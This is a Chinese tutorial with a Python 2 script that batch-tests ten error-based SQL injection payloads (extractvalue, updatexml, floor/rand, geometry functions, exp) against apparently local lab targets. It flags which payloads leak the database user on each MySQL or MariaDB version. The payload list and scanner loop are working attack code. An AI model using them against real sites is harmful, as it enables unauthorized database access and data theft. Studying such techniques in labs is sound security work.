使用脚本批量去判断每个网站使用的数据库能使用的报错注入函数

在这里将每个网址和它对应的数据库用字典连接起来,方便输出时查看函数。

# Target URL -> label of the database version behind it, printed next to the results
# so each hit can be read as "this function produced an echo on this version".
# NOTE(review): keys must match the target list exactly; the full script below lists
# the second host as Less-5 while this key says Less-2, so that lookup would raise KeyError.
banben = {
    "http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'": "版本为mysql8.0",
    "http://192.168.100.197/Less-2/?id=1": "版本为mysql5.0",
    "http://192.168.100.144/index.php?author=admin'": "版本为mariadb 5.5",
}

将常见的报错注入函数放入列表中方便遍历

# Error-based probes tried one by one against each target.  Every entry wraps
# `select user()`, which is why the success check later looks for the database
# account name in the response body.
li = [
    "and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "and (extractvalue(1,concat(0x7e,(select user()),0x7e)))",
    "and (updatexml(1,concat(0x7e,(select user()),0x7e),1))",
    "and geometrycollection((select * from(select * from(select user())a)b))",
    "and multipoint((select * from(select * from(select user())a)b))",
    "and polygon((select * from(select * from(select user())a)b))",
    "and multipolygon((select * from(select * from(select user())a)b))",
    "and linestring((select * from(select * from(select user())a)b))",
    "and multilinestring((select * from(select * from(select user())a)b))",
    "and exp(~(select * from(select user())a))",
]

使用root作为关键字判断网页是否有回显,如果有回显证明此报错注入函数有用。

root@localhost

总体代码如下:

# coding=UTF-8
import requests
import re
import base64

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

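# Lab targets to sweep.  Each URL already carries the parameter under test.
lists = [
    "http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'",
    "http://192.168.100.197/Less-5/?id=1",
    "http://192.168.100.144/index.php?author=admin'"
]

# Target URL -> label of the database version behind it, printed with the results.
# NOTE(review): the second key here says Less-2 while `lists` says Less-5, so the
# original `banben[url]` lookup raised KeyError on that target and aborted the sweep;
# the `.get` fallback in the loop below keeps going and prints the URL instead.
banben = {"http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'":"版本为mysql8.0","http://192.168.100.197/Less-2/?id=1":"版本为mysql5.0","http://192.168.100.144/index.php?author=admin'":"版本为mariadb 5.5"}

# Leftover debug print from the original; kept so the output is unchanged.
print(banben["http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'"])

# Error-based probes; every one wraps `select user()`, so a page that echoes the
# database error contains the DB account name.
li = [
    "and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "and (extractvalue(1,concat(0x7e,(select user()),0x7e)))",
    "and (updatexml(1,concat(0x7e,(select user()),0x7e),1))",
    "and geometrycollection((select * from(select * from(select user())a)b))",
    "and multipoint((select * from(select * from(select user())a)b))",
    "and polygon((select * from(select * from(select user())a)b))",
    "and multipolygon((select * from(select * from(select user())a)b))",
    "and linestring((select * from(select * from(select user())a)b))",
    "and multilinestring((select * from(select * from(select user())a)b))",
    "and exp(~(select * from(select user())a))"
]

# Success marker: the response must contain this literal.  A plain substring test
# replaces the original re.search, which was only ever matching a fixed string.
# NOTE(review): this assumes the lab DB account is root@localhost; any other account
# name is reported as "no echo" even when the error text is present — confirm per target.
MARKER = "root@localhost"

for url in lists:
    print("这时候测试的是{}".format(banben.get(url, url)))
    for payload in li:
        # Original used format(li[j]), which for a str is the str itself.
        yuju = url + " " + payload + " -- |"
        try:
            # A timeout keeps one unresponsive host from hanging the whole run.
            shuju = requests.get(yuju, timeout=10)
        except requests.RequestException as exc:
            # Report and continue rather than abort the sweep on a transport error.
            print("request failed for {}: {}".format(url, exc))
            continue

        # Print the probe that produced an echo of the account name.
        if MARKER in shuju.text:
            print(payload)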